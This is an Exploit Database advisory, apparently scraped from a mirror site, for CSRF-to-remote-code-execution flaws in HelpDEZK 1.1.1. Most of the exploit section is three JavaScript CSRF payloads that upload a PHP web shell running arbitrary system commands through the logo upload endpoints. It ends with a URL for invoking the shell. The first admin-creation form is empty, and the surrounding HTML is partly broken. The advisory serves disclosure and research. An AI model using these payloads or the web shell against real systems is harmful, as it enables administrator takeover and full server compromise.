HelpDEZK 1.1.1 – Cross-Site Request Forgery / Code Execution

Exploit Database
108 阅读

作者： rungga_reksya

日期： 2017-04-05
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/41824/

100

101

102

103

104

105

106

107

108

109

110

111

112

113

114

115

116

117

118

119

120

121

122

123

124

125

126

127

128

129

130

131

132

133

134

135

136

137

138

139

140

141

142

143

144

145

146

147

148

149

150

151

152

153

154

155

156

157

158

159

160

161

162

163

164

165

166

167

168

169

170

171

172

173

174

175

176

177

178

179

180

181

182

183

184

185

186

187

188

189

190

191

192

193

194

195

196

197

198

199

200

201

202

203

204

205

206

207

208

209

210

211

212

213

# Exploit Title: Multiple CSRF Remote Code Execution Vulnerability on HelpDEZK 1.1.1

# Date: 05-April-2017

# Exploit Author: @rungga_reksya, @yokoacc, @AdyWikradinata, @dickysofficial, @dvnrcy

# Vendor Homepage: http://www.helpdezk.org/

# Software Link: https://codeload.github.com/albandes/helpdezk/zip/v1.1.1

# Version: 1.1.1

# Tested on: Windows Server 2012 Datacenter Evaluation

# CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N (9.1 - CRITICAL)# CVE: CVE-2017-7446 and CVE-2017-7447

I. Background:

HelpDEZk is a powerfull software that manages requests/incidents. It has all the needed requirements to an efficient workflow management of all processes involved in service execution. This control is done for internal demands and also for outsourced services. HelpDEZk can be used at any company's area, serving as an support to the shared service center concept, beyond the ability to log all the processes and maintain the request's history, it can pass it through many approval levels. HelpDEZk can put together advanced managing resources with an extremely easy use. Simple and intuitive screens make the day-by-day easier for your team, speeding up the procedures and saving up a lot of time. It is developped in objects oriented PHP language, with the MVC architecture and uses the templates system SMARTY. For the javascripts, JQUERY is used.

II. Description:

Cross-Site Request Forgery (CSRF) is an attack that forces an end user to execute unwanted actions on a web application in which they're currently authenticated. CSRF attacks specifically target state-changing requests, not theft of data, since the attacker has no way to see the response to the forged request. With a little help of social engineering (such as sending a link via email or chat), an attacker may trick the users of a web application into executing actions of the attacker's choosing. If the victim is a normal user, a successful CSRF attack can force the user to perform state changing requests like transferring funds, changing their email address, and so forth. If the victim is an administrative account, CSRF can compromise the entire web application.

HelpDEZK have role for type person:

admin = 1

user = 2

operator = 3

costumer = 4

partner = 5

group = 6

III. Exploit:

—> The first CSRF Target is: “/admin/home#/person/”

(Admin - Records - People & Companies)

The guest (no have account) can make admin privilege with CSRF Remote Code Execution. This is script for make account admin:

<html>

<body>

</form>

</body>

</html>

—> The second CSRF target is: /admin/home#/logos/

(Admin - Config - Logos)

If we have minimum low privilege, we can remote code execute to make shell on module logos (Position of Page Header, Login Page and Reports Logo). The HelpDEZK unrestricted file extension but normally access only for admin.

If you have low privilege, please choose which one to execute this code (before execute, you shall login into application): 

<html>

<body>

function submitRequest()

{

var xhr = new XMLHttpRequest();

xhr.open("POST", "http://192.168.228.186/helpdezk-1.1.1/admin/logos/upload2", true);

xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");

xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");

xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------1883328331133778598415248998");

xhr.withCredentials = true;

var body = "-----------------------------1883328331133778598415248998\r\n" +

"Content-Disposition: form-data; name=\"file\"; filename=\"index.php\"\r\n" +

"Content-Type: text/php\r\n" +

"\r\n" +

"\x3c?php\n" +

"\n" +

"if(isset($_REQUEST[\'cmd\'])){\n" +

"echo \"\x3cpre\x3e\";\n" +

"$cmd = ($_REQUEST[\'cmd\']);\n" +

"system($cmd);\n" +

"echo \"\x3c/pre\x3e\";\n" +

"die;\n" +

"}\n" +

"\n" +

"?\x3e\r\n" +

"-----------------------------1883328331133778598415248998--\r\n";

var aBody = new Uint8Array(body.length);

for (var i = 0; i < aBody.length; i++)

aBody[i] = body.charCodeAt(i);

xhr.send(new Blob([aBody]));

}

</script>

</form>

</body>

</html>

————

<html>

<body>

function submitRequest()

{

var xhr = new XMLHttpRequest();

xhr.open("POST", "http://192.168.228.186/helpdezk-1.1.1/admin/logos/upload", true);

xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");

xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");

xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------11525671838941487412014811928");

xhr.withCredentials = true;

var body = "-----------------------------11525671838941487412014811928\r\n" +

"Content-Disposition: form-data; name=\"file\"; filename=\"shell.php\"\r\n" +

"Content-Type: text/php\r\n" +

"\r\n" +

"\x3c?php\n" +

"\n" +

"if(isset($_REQUEST[\'cmd\'])){\n" +

"echo \"\x3cpre\x3e\";\n" +

"$cmd = ($_REQUEST[\'cmd\']);\n" +

"system($cmd);\n" +

"echo \"\x3c/pre\x3e\";\n" +

"die;\n" +

"}\n" +

"\n" +

"?\x3e\r\n" +

"-----------------------------11525671838941487412014811928--\r\n";

var aBody = new Uint8Array(body.length);

for (var i = 0; i < aBody.length; i++)

aBody[i] = body.charCodeAt(i);

xhr.send(new Blob([aBody]));

}

</script>

</form>

</body>

</html>

———————

<html>

<body>

function submitRequest()

{

var xhr = new XMLHttpRequest();

xhr.open("POST", "http://192.168.228.186/helpdezk-1.1.1/admin/logos/upload3", true);

xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");

xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");

xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------1789373681642463979344317937");

xhr.withCredentials = true;

var body = "-----------------------------1789373681642463979344317937\r\n" +

"Content-Disposition: form-data; name=\"file\"; filename=\"index.php\"\r\n" +

"Content-Type: text/php\r\n" +

"\r\n" +

"\x3c?php\n" +

"\n" +

"if(isset($_REQUEST[\'cmd\'])){\n" +

"echo \"\x3cpre\x3e\";\n" +

"$cmd = ($_REQUEST[\'cmd\']);\n" +

"system($cmd);\n" +

"echo \"\x3c/pre\x3e\";\n" +

"die;\n" +

"}\n" +

"\n" +

"?\x3e\r\n" +

"-----------------------------1789373681642463979344317937--\r\n";

var aBody = new Uint8Array(body.length);

for (var i = 0; i < aBody.length; i++)

aBody[i] = body.charCodeAt(i);

xhr.send(new Blob([aBody]));

}

</script>

</form>

</body>

</html>

————

If you have executed and success, check your file on:

http://example.com/helpdezk-1.1.1/app/uploads/logos/

and PWN ^_^

http://example.com/helpdezk-1.1.1/app/uploads/logos/login_index.php?cmd=ipconfig

IV. Thanks to:

- Alloh SWT

- MyBoboboy

- Komunitas IT Auditor & IT Security

Refer:

https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)

https://www.owasp.org/index.php/Testing_for_Privilege_escalation_(OTG-AUTHZ-003)http://rungga.blogspot.co.id/2017/04/multiple-csrf-remote-code-execution.html

https://github.com/albandes/helpdezk/issues/2